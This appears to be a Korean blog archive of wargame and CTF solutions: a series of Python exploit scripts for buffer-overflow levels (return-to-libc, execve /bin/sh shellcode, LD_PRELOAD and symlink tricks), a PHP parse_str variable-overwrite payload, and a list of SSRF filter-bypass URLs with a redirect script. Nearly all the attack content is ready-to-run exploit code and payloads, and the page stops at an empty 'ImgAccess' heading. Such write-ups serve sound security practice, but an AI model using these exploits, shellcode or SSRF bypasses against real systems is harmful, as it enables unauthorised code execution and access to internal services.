'2019/04'에 해당되는 글 41건

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/darkknight/bugbear'
systemAddress = p(0x40058ae0)
shellParamAddress = p(0xbffffc6d)
payload = "A"*44 + systemAddress + "BBBB" + shellParamAddress

os.execl(path,path,payload)

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/golem/darkknight'
shellAddress = p(0xbffffa98)
FPO_Byte = "\x90"
payload = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*11+FPO_Byte

os.execl(path,path,payload)

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/skeleton/golem'
shellAddress =  p(0xbffff530)
payload = "A"*44+shellAddress
shellCode = "\x90"*155+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"

os.system("touch test.c")
os.system("gcc -shared -fPIC -o " + shellCode + " test.c")
os.environ["LD_PRELOAD"] = "./"+shellCode
os.execl(path,path,payload)

exploit.py

import os
from struct import *


p = lambda x : pack("<L" , x)
path = '/home/troll/vampire'
shellAddress =  p(0xbffef96c)
payload = "A"*44+shellAddress
shellCode = "\x90"*1000+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"B"*65535
os.execl(path,path,payload,shellCode)

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/orge/troll'
shellAddress =  p(0xbffffba8)
payload = "A"*44+shellAddress
shellCode = "\x90"*28+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"


os.system("/bin/ln -s " + path + " " + shellCode)


os.execl("./"+shellCode,"./"+shellCode,payload)

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/darkelf/orge'
shellAddress =  p(0xbffffb8c)
payload = "A"*44+shellAddress
shellCode = "\x90"*27+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"


os.system("/bin/ln -s " + path + " " + shellCode)


os.execl("./"+shellCode,"./"+shellCode,payload)

EasyPHP

문제에서 소스를 제공해준다. 간단한 PHP Trick류다.

<?php
$hashed_key = '79abe9e217c2532193f910434453b2b9521a94c25ddc2e34f55947dea77d70ff';
$parsed = parse_url($_SERVER['REQUEST_URI']);
if(isset($parsed["query"])){
    $query = $parsed["query"];
    $parsed_query = parse_str($query);
    if($parsed_query!=NULL){
        $action = $parsed_query['action'];
    }

    if($action==="auth"){
        $key = $_GET["key"];
        $hashed_input = hash('sha256', $key);
        //echo $hashed_input.'\n';
        if($hashed_input!==$hashed_key){
            die("GTFO!");
        }

        echo file_get_contents("/flag");
    }
}else{
    show_source(__FILE__);
}
?>

인풋의 sha256값이 79abe9e217c2532193f910434453b2b9521a94c25ddc2e34f55947dea77d70ff 값이어야 하는데 해당 값은 레인보우 테이블에서 조회되지 않는 값이라 원본 값을 모른다.

근데 딱봐도 수상한게 action파라미터 값 받아올 때 $_GET['action'] 일케 안받고 parse_str쓰고 있다. parse_str은 변수를 덮을 수 있어서 그냥 hashed_key를 덮어버리면 된다.

payload

http://easyphp.ctf.euristica.in/?action=auth&key=1&hashed_key=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

Online Previewer 1

SSRF 문제다. 소스에서 http://127.0.0.1:1337로 접근하라고 하는데 필터가 되어있다.

http://asdf@127.0.0.1:1337

http://asdf#@127.0.0.1:1337

http://asdf?@127.0.0.1:1337

http://2130706433:1337/

http://0177.0.0.1:1337/

http://localhost:1337/

http://my_server/test.php

test.php

<?php

header('Location: http://127.0.0.1:1337');

?>

..등등

요런거 다 안먹혀서 localhost말고 127.0.0.1 반환해주는 도메인을 사용했다.

payload 

http://lvh.me:1337

ImgAccess